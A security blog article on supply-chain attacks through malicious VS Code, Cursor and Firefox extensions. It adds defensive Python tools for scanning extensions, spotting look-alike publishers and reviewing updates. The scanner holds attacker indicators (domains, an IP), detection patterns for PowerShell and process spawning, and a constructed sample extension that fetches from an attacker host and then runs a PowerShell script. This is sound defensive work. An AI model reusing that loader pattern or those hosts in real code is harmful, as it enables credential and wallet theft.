When the Store Is the Backdoor: IDE & Add-on Extensions Are the New Supply Chain


While scanning my daily news feeds in Feeder, one story keeps resurfacing: malicious code extensions targeting developers by manipulating marketplaces. It’s a reminder of an often overlooked attack vector in the developer ecosystem that deserves attention.
When Datadog Pulled Back the Curtain
VS Code / Solidity (May 2025): Datadog uncovered three trojanized VS Code extensions (solaibot, among-eth, blankebesxstnion) that targeted Windows-based Solidity developers. The extensions ran obfuscated code, fetched multi-stage payloads via PowerShell, and ultimately dropped a browser extension and Windows binaries to siphon credentials (including crypto wallet data). Microsoft removed them; cumulative installs were under 50 before takedown.
Cursor AI (June – July 2025): Security researchers at Kaspersky uncovered a case where a developer lost around $500,000 in cryptocurrency after installing what appeared to be a legitimate “Solidity Language” coding add-on for the Cursor AI editor. Cursor supports extensions from the Open VSX registry, which also hosts plugins compatible with Visual Studio Code.
The malicious extension wasn’t just a coding tool: it quietly downloaded PowerShell scripts from attacker-controlled servers, installed ScreenConnect remote-access software, then deployed Quasar RAT (a remote access trojan) along with a custom data stealer. These tools siphoned off browser passwords, email credentials, and crypto wallet keys.
After the first fake extension was removed on July 2, the attackers uploaded a nearly identical copy, this time using a look-alike publisher name (“juanbIanco” instead of the legitimate “juanblanco”). For a short time, this counterfeit even outranked the real plugin in Cursor’s search results because the marketplace algorithm favoured recently updated packages. Researchers believe the inflated “~2 million downloads” shown in search was likely manipulated to create a false sense of trust and popularity.
Firefox add-ons (August 2025): Security researchers at Koi Security disclosed a sophisticated campaign code-named GreedyBear in which attackers published over 150 benign-seeming Firefox extensions, including ones mimicking popular crypto wallets like MetaMask, Exodus, and TronLink. They first uploaded safe utilities to build trust and positive reviews, then “hollowed out” these extensions (Extension Hollowing), replacing their code and assets with credential-stealing logic while retaining their good reputation. This technique bypassed initial reviews and leveraged users’ trust in rated extensions. The malicious updates captured wallet credentials and user IPs, funnelling over $1 million in losses before Mozilla removed the extensions.
How widespread is it?
The VS Code/Solidity wave: small initial install base (<50 downloads) before removal limited blast radius but high-value targeting.
The Cursor case: at least one confirmed instance of a $500k theft.
The Firefox cluster: ~150 malicious add-ons, ~$1M drained before mass removal, evidence that extension ecosystems remain attractive monetisation vectors.
Safeguards that are in place
Marketplace takedowns & scanning (VS Code): Microsoft pulled the malicious Solidity extensions quickly. Datadog notes these ecosystems use automated scanning, but determined adversaries can still slip through with obfuscation and staged payloads.
Cursor AI hardening (late July 2025): After responsible disclosure on July 16, Cursor v1.3 changed its trust model: any change to an approved MCP configuration now requires re-approval, cutting off “benign-then-swap” abuse routes for persistent code execution (CVE-2025-54136, “MCPoison”).
Firefox early-detection system (June 2025): Mozilla introduced automated risk-profiling for wallet extensions and new review heuristics for crypto-drainer behaviours, essentially a front-door tripwire before extensions “find traction.”
Is This a New Threat or Just an Old One Evolving?
This isn’t a brand-new problem; it’s a familiar attack model getting sharper. Supply chain compromises through plugins, add-ons, and open-source packages have been around for years. What’s different now is the convergence: multiple marketplaces, similar tactics, and a focus on high-value technical users.
Safe at first and then the good old switcheroo trick
Both the GreedyBear Firefox campaign and the recent IDE extension cases relied on the same playbook: publish harmless code to pass review, then quietly swap in wallet-draining or credential-stealing logic once the extension gains trust.
Typosquatting meets algorithm gaming
In the Cursor incident, the fake “juanbIanco” publisher (just one letter off from the real “juanblanco”) used recency-weighted search rankings to leapfrog the legitimate package, exploiting how the marketplace surfaces “fresh” updates.
Same fingerprints across campaigns
Kaspersky found that the malicious Cursor plugin’s scripts and payload chain closely matched earlier VS Code attacks in April–May 2025 (solaibot, among-eth, blankebesxstnion). Datadog also saw attackers updating payloads after discovery, evidence of an active and iterative operation, whether from the same group or skilled imitators.
Why it matters
Security analysts agree: malicious open-source and extension packages are a low-volume, high-impact threat. Few victims, but those victims are often developers with access to valuable code, keys, and infrastructure, making lateral movement and follow-on compromise far more damaging than a broad, noisy attack.
Practical red flags to watch for
Suspicious network calls and hidden loaders
In the VS Code/Solidity attack, the extensions reached out to solidity[.]bot/version.json, a signal that triggered Windows-only PowerShell scripts. These scripts pulled hidden payloads from unexpected places, like image files on the Internet Archive, and dropped suspicious executables (myau.exe, myaunet.exe).
In the Cursor case, the plugin fetched scripts from angelic[.]su and paste[.]ee, installed ScreenConnect from lmfao[.]su, and connected to attacker servers at 144.172.112[.]84 / relay.lmfao[.]su. From there, it deployed Quasar RAT and a custom data stealer.
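The indicators in the two paragraphs above are exactly what a pre-install or CI check can look for before an extension is allowed onto a developer machine. The following is an added example, not code from the article or from Datadog or Kaspersky: a static scanner that walks an unpacked extension, matches the defanged domains and IP quoted above (refanged only for matching), and flags loader heuristics such as child-process spawning, PowerShell strings, dynamic evaluation and long base64 runs. The weights, thresholds and the two sample extensions it scans are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Network indicators from the incidents described above, kept defanged as in
# the article and refanged only for matching against extension source text.
DEFANGED_IOCS = [
    "solidity[.]bot", "angelic[.]su", "paste[.]ee", "lmfao[.]su",
    "relay.lmfao[.]su", "144.172.112[.]84",
]
IOCS = [ioc.replace("[.]", ".") for ioc in DEFANGED_IOCS]

# Loader heuristics (assumed patterns): process spawning, PowerShell strings,
# dynamic code evaluation, long base64 runs, and any external URL.
PATTERNS = {
    "child_process": re.compile(r"\bchild_process\b|\b(?:exec|execSync|spawn)\s*\("),
    "powershell": re.compile(r"powershell", re.IGNORECASE),
    "dynamic_eval": re.compile(r"\beval\s*\(|new\s+Function\s*\("),
    "base64_blob": re.compile(r"[A-Za-z0-9+/]{200,}={0,2}"),
    "external_url": re.compile(r"https?://[^\s'\"`)]+"),
}
# Assumed weights: a known indicator alone is enough to block an install.
WEIGHTS = {"known_ioc": 10, "powershell": 5, "child_process": 3,
           "dynamic_eval": 3, "base64_blob": 2, "external_url": 1}
SCANNED_SUFFIXES = {".js", ".mjs", ".cjs", ".json", ".ps1"}


def scan_source(text):
    """Return (kind, evidence) pairs found in one file's text."""
    findings = []
    lowered = text.lower()
    for ioc in IOCS:
        if ioc in lowered:
            findings.append(("known_ioc", ioc))
    for kind, pattern in PATTERNS.items():
        for match in pattern.finditer(text):
            findings.append((kind, match.group(0)[:80]))
    return findings


def scan_extension_dir(root):
    """Map each flagged file (path relative to root, POSIX form) to its findings."""
    root = Path(root)
    report = {}
    for path in root.rglob("*"):
        if path.is_file() and path.suffix in SCANNED_SUFFIXES:
            findings = scan_source(path.read_text(errors="ignore"))
            if findings:
                report[path.relative_to(root).as_posix()] = findings
    return report


def risk_score(findings):
    """Weighted sum for one file's findings; used to order files for review."""
    return sum(WEIGHTS[kind] for kind, _ in findings)


# Constructed sample extensions: one ordinary, one modelled on the reported
# loader behaviour (fetch a version file, then hand off to PowerShell).
SAMPLE_FILES = {
    "benign/extension.js": (
        "const vscode = require('vscode');\n"
        "vscode.commands.registerCommand('ext.docs', () =>\n"
        "  vscode.env.openExternal('https://code.visualstudio.com/api'));\n"
    ),
    "suspicious/extension.js": (
        "const { exec } = require('child_process');\n"
        "fetch('https://solidity.bot/version.json').then(() =>\n"
        "  exec('powershell -NoProfile -File stage.ps1'));\n"
    ),
}


def scan_sample():
    """Write the constructed samples to a temp dir and scan them."""
    root = Path(tempfile.mkdtemp(prefix="ext-scan-"))
    for rel, text in SAMPLE_FILES.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(text)
    return scan_extension_dir(root)


if __name__ == "__main__":
    ranked = sorted(scan_sample().items(), key=lambda kv: -risk_score(kv[1]))
    for rel, findings in ranked:
        print(f"{risk_score(findings):3d}  {rel}")
        for kind, evidence in findings:
            print(f"      {kind:<14} {evidence}")
```

Run it against a real extension by calling scan_extension_dir() on the unpacked .vsix directory (usually under ~/.vscode/extensions/); the point of the weighting is that a hit on a known indicator outranks any number of ordinary URLs, while a child-process call plus a PowerShell string is worth a manual look even with no known indicator present.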
Look-alike publisher names
One fake plugin used the name “juanbIanco” instead of the real “juanblanco.” The subtle font differences between a capital “I” and lowercase “l” made them almost impossible to tell apart. The lesson: don’t rely on the display name alone, check if the publisher is verified.
Search results that don’t make sense
In the Open VSX/Cursor ecosystem, recently updated and artificially padded packages briefly outranked trusted ones. If the top result is unverified, brand new, or updated just yesterday, be skeptical.
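The two red flags just described, a publisher name one glyph away from a trusted one, and a listing whose age, verification status and download count don't add up, can both be checked mechanically before anyone clicks Install. The following is an added example, not code from the article, from Kaspersky or from any marketplace: it collapses publisher names to an on-screen "skeleton" (capital I and lowercase l map to the same character, as in the juanbIanco/juanblanco case), compares them against a team-maintained allowlist, and scores search results against the listing heuristics above. The allowlist, confusable table, thresholds and the two sample listings are assumptions constructed for illustration.

```python
import unicodedata
from datetime import datetime

# Characters that render near-identically in common UI fonts. Capital I vs
# lowercase l is the pair abused in the Cursor incident; the remaining
# mappings are common confusables added here as an assumption.
CONFUSABLES = {"I": "l", "1": "l", "|": "l", "0": "o", "O": "o", "5": "s", "$": "s"}
# Publishers the team has vetted: an assumed allowlist, not a marketplace feature.
TRUSTED_PUBLISHERS = {"juanblanco"}


def skeleton(name):
    """Collapse a name to what it looks like on screen rather than its code points."""
    text = unicodedata.normalize("NFKC", name)
    text = "".join(CONFUSABLES.get(ch, ch) for ch in text).lower()
    text = text.replace("rn", "m")
    return "".join(ch for ch in text if ch.isalnum())


def edit_distance(a, b):
    """Levenshtein distance; one edit is enough to catch most typosquats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_of(publisher, trusted=TRUSTED_PUBLISHERS):
    """Return the trusted name this publisher imitates, or None."""
    if publisher in trusted:
        return None
    sk = skeleton(publisher)
    for name in trusted:
        if edit_distance(sk, skeleton(name)) <= 1:
            return name
    return None


def assess_listing(listing, now, trusted=TRUSTED_PUBLISHERS):
    """Red flags for one search result; the day and rate thresholds are assumptions."""
    reasons = []
    imitated = lookalike_of(listing["publisher"], trusted)
    if imitated:
        reasons.append(f"publisher looks like trusted '{imitated}'")
    if not listing["verified"]:
        reasons.append("publisher not verified")
    age_days = max((now - listing["published"]).days, 1)
    if age_days < 14:
        reasons.append("listing is brand new")
    if (now - listing["last_updated"]).days <= 1:
        reasons.append("updated in the last day")
    if listing["downloads"] / age_days > 50_000:
        reasons.append("download count implausible for listing age")
    return reasons


def rank_for_review(listings, now, trusted=TRUSTED_PUBLISHERS):
    """Most suspicious first: what a reviewer or a pre-install hook would look at."""
    scored = [(item["name"], assess_listing(item, now, trusted)) for item in listings]
    return sorted(scored, key=lambda pair: -len(pair[1]))


# Constructed search results modelled on the incident: the genuine package and
# a look-alike that was updated yesterday and shows an inflated download count.
NOW = datetime(2025, 7, 10)
LISTINGS = [
    {"name": "solidity (juanblanco)", "publisher": "juanblanco", "verified": True,
     "published": datetime(2017, 1, 1), "last_updated": datetime(2025, 3, 1),
     "downloads": 1_200_000},
    {"name": "solidity (juanbIanco)", "publisher": "juanbIanco", "verified": False,
     "published": datetime(2025, 7, 3), "last_updated": datetime(2025, 7, 9),
     "downloads": 2_000_000},
]

if __name__ == "__main__":
    for name, reasons in rank_for_review(LISTINGS, NOW):
        print(name, "->", reasons or "no red flags")
```

The skeleton comparison is deliberately done before lowercasing: casefolding first would turn the capital I into i and hide the very substitution the attacker relied on.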
Good today, bad tomorrow
In the Firefox campaign, attackers uploaded safe extensions that passed review then later swapped in wallet-draining code. This “benign-then-malicious” tactic is now something marketplaces actively look for, but it still happens.
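Because the swap happens in an update, the defence is to treat an update as a new submission whenever it gains capabilities. The following is an added example, not code from the article, Mozilla or Koi Security: it hashes every file in two versions of an unpacked WebExtension package, diffs the manifests for new permissions, host access and content-script targets, and triages the update as hold, diff-review or ok. The fictional "Quick Notes" add-on and its hollowed-out second version are constructed for illustration, as is the wallet.example host.

```python
import hashlib
import json


def file_hashes(files):
    """files maps path -> bytes for an unpacked extension package."""
    return {path: hashlib.sha256(data).hexdigest() for path, data in files.items()}


def file_diff(old_files, new_files):
    """Which files an update added, removed or modified (by content hash)."""
    old_h, new_h = file_hashes(old_files), file_hashes(new_files)
    return {
        "added": sorted(new_h.keys() - old_h.keys()),
        "removed": sorted(old_h.keys() - new_h.keys()),
        "modified": sorted(p for p in old_h.keys() & new_h.keys() if old_h[p] != new_h[p]),
    }


def manifest_capability_growth(old, new):
    """Permissions, host access and content-script targets the update adds."""
    growth = []
    for key in ("permissions", "optional_permissions", "host_permissions"):
        added = set(new.get(key, [])) - set(old.get(key, []))
        if added:
            growth.append((key, sorted(added)))
    old_targets = {m for cs in old.get("content_scripts", []) for m in cs.get("matches", [])}
    new_targets = {m for cs in new.get("content_scripts", []) for m in cs.get("matches", [])}
    if new_targets - old_targets:
        growth.append(("content_script_matches", sorted(new_targets - old_targets)))
    return growth


def review_update(old_files, new_files):
    """Triage: 'hold' on capability growth, 'diff-review' on code-only changes,
    'ok' when nothing material changed."""
    growth = manifest_capability_growth(
        json.loads(old_files["manifest.json"]), json.loads(new_files["manifest.json"]))
    diff = file_diff(old_files, new_files)
    code_changed = [p for p in diff["added"] + diff["modified"] if p.endswith((".js", ".html"))]
    if growth:
        verdict = "hold"
    elif code_changed:
        verdict = "diff-review"
    else:
        verdict = "ok"
    return {"verdict": verdict, "growth": growth, "code_changed": code_changed, "files": diff}


# Constructed versions of a fictional notes add-on: v1 as reviewed, v2 as a
# hollowed-out update that widens access and injects into a wallet site.
V1_MANIFEST = {
    "manifest_version": 3, "name": "Quick Notes", "version": "1.0",
    "permissions": ["storage"],
    "background": {"scripts": ["background.js"]},
}
V2_MANIFEST = {
    "manifest_version": 3, "name": "Quick Notes", "version": "1.1",
    "permissions": ["storage", "webRequest"],
    "host_permissions": ["<all_urls>"],
    "background": {"scripts": ["background.js"]},
    "content_scripts": [{"matches": ["https://*.wallet.example/*"], "js": ["inject.js"]}],
}
V1_FILES = {
    "manifest.json": json.dumps(V1_MANIFEST).encode(),
    "background.js": b"// v1: saves notes to browser.storage.local\n",
}
V2_FILES = {
    "manifest.json": json.dumps(V2_MANIFEST).encode(),
    "background.js": b"// v2: rewritten background script\n",
    "inject.js": b"// v2: new content script (constructed placeholder)\n",
}
# A code-only change with no new capabilities, for comparison.
V1B_FILES = dict(V1_FILES, **{"background.js": b"// v1.0.1: bug fix\n"})

if __name__ == "__main__":
    print(json.dumps(review_update(V1_FILES, V2_FILES), indent=2))
```

The same check works on the client side: keep the hashes and manifest of each installed extension at approval time, and re-run review_update() against the new package before an auto-update is allowed to activate, so a version that suddenly asks for <all_urls> or starts matching wallet sites stays pinned until someone has read the diff.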
Could it happen again?
Yes. The incentives are strong and the path is repeatable: typosquat a trusted tool, ship benign code to pass checks, flip the switch later. Even with Mozilla’s new risk-profiling and Cursor’s MCP re-approval, extension ecosystems remain a cat-and-mouse game where motivated actors can iterate until something sticks. Datadog’s observation that operators changed payloads after exposure is the tell. Expect more surgical, financially motivated campaigns against dev tools and wallet surfaces.